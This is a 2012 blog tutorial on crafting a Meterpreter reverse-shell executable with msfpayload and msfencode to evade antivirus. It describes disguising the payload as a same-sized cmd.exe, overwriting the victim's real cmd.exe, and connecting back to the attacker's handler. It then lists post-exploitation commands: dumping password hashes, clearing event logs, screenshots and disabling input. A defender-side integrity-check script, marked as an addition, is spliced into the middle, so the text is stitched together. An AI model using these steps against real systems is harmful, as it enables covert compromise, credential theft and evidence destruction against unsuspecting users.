Saturday, 20 October 2012

Transferring Crafted Files, Part 2: More Advanced Meterpreter

OK, we continue our discussion. After learning about most of the payload types Metasploit provides, we now try to craft a file using a combination of msfpayload and msfencode. The purpose of msfencode is to evade antivirus detection of the exploit files we send to our victim.
OK, enough talking, let's practise ^^
1. Run this command
The command above means:
  • we create the payload using the msfpayload module meterpreter reverse tcp
  • we use listening host (our IP) 192.168.56.1
  • we use listening port 6789
  • we encode with msfencode using the shikata ga nai encoder
  • we run the encoder for 5 iterations (-c 5)
  • we create an exe file (-t exe)
  • we save the file as cmd.exe
Wait a minute, there is one small detail that deserves attention: look at the cmd.exe file we crafted (73 KB on mine) and compare it with the real cmd.exe from Windows (380 KB). For a beginner user this is no problem, but an intermediate user will check the size of cmd.exe, because it does not run as usual. So if we want to make our file look more convincing we can modify our command.
First, copy the real cmd.exe from Windows XP and rename it, e.g. to cmd2.exe. Then run this command:

Then copy our crafted file (cmd3.exe) to Windows and try to overwrite the real cmd.exe by renaming our file.
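A defender-side check for the size discrepancy described above, added here as an example and not part of the original post: it records a size and SHA-256 baseline for a system binary while it is trusted, then reports both a naive replacement (different size) and a template-based one (same size, different content), which only the hash catches. All paths, sizes and file contents are constructed for the demonstration.

```python
# Added example: baseline integrity check for a system binary such as cmd.exe.
# Paths, sizes and file contents below are constructed for the demonstration.
import hashlib
import os
import tempfile

def fingerprint(path):
    """Return (size_in_bytes, sha256_hex) of the file at path."""
    h = hashlib.sha256()
    size = 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            size += len(chunk)
            h.update(chunk)
    return size, h.hexdigest()

def check_baseline(baseline):
    """baseline maps path -> (expected_size, expected_sha256).
    Returns a list of (path, reason) for every file that no longer matches."""
    findings = []
    for path, (exp_size, exp_hash) in baseline.items():
        if not os.path.isfile(path):
            findings.append((path, "missing"))
            continue
        size, digest = fingerprint(path)
        if size != exp_size:
            findings.append((path, "size changed: %d -> %d" % (exp_size, size)))
        elif digest != exp_hash:
            findings.append((path, "same size but hash changed"))
    return findings

def simulate():
    """Constructed scenario: record a baseline, then apply two kinds of replacement."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "cmd.exe")
        genuine = bytes(range(256)) * 1520          # 389120 bytes: a 380 KB stand-in
        with open(target, "wb") as f:
            f.write(genuine)
        baseline = {target: fingerprint(target)}    # taken while the file is trusted
        with open(target, "wb") as f:               # 1) naive swap: a 73 KB file
            f.write(b"A" * 73 * 1024)
        naive = check_baseline(baseline)
        with open(target, "wb") as f:               # 2) template swap: same size
            f.write(genuine[:-1] + b"\x00")
        templated = check_baseline(baseline)
    return naive, templated

if __name__ == "__main__":
    for label, found in zip(("naive", "templated"), simulate()):
        print(label, found)
```

A size-only check is what the post's intermediate user does; the hash comparison is what a file-integrity monitor needs in order to catch the template-based replacement too.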

2. Run the handler
Because we selected a reverse Meterpreter payload, we need to set up the exploit handler to handle the connection back to our attacking machine. In this case the attacker uses IP address 192.168.56.1. Open the Metasploit console by typing msfconsole, and then run:

3. Run our crafted file (cmd3.exe), or in a real scenario wait for the victim to use cmd.exe (after we have overwritten the real cmd file). Our shell should then look like:

Done ^^
More Advanced Meterpreter
Because we still have some work to finish, we continue by using Meterpreter's features to control the victim system. Use ? or -h for a list of commands.
Here we are after using some of the commands:

^^ We try to disable the mouse and keyboard of our lab machine... and done, haha. Now we try several commands:
meterpreter> help                    #Meterpreter help#
meterpreter> hashdump                #dump Windows system hash values#
meterpreter> sysinfo                 #system information#
meterpreter> shell                   #get a command prompt (cmd.exe)#
meterpreter> background              #return to the msf console#
meterpreter> ps                      #process list#
meterpreter> execute -f notepad.exe  #execute notepad on the victim machine#
meterpreter> clearev                 #clear the Windows event logs#
meterpreter> screenshot              #take a snapshot of the victim desktop#

Result:
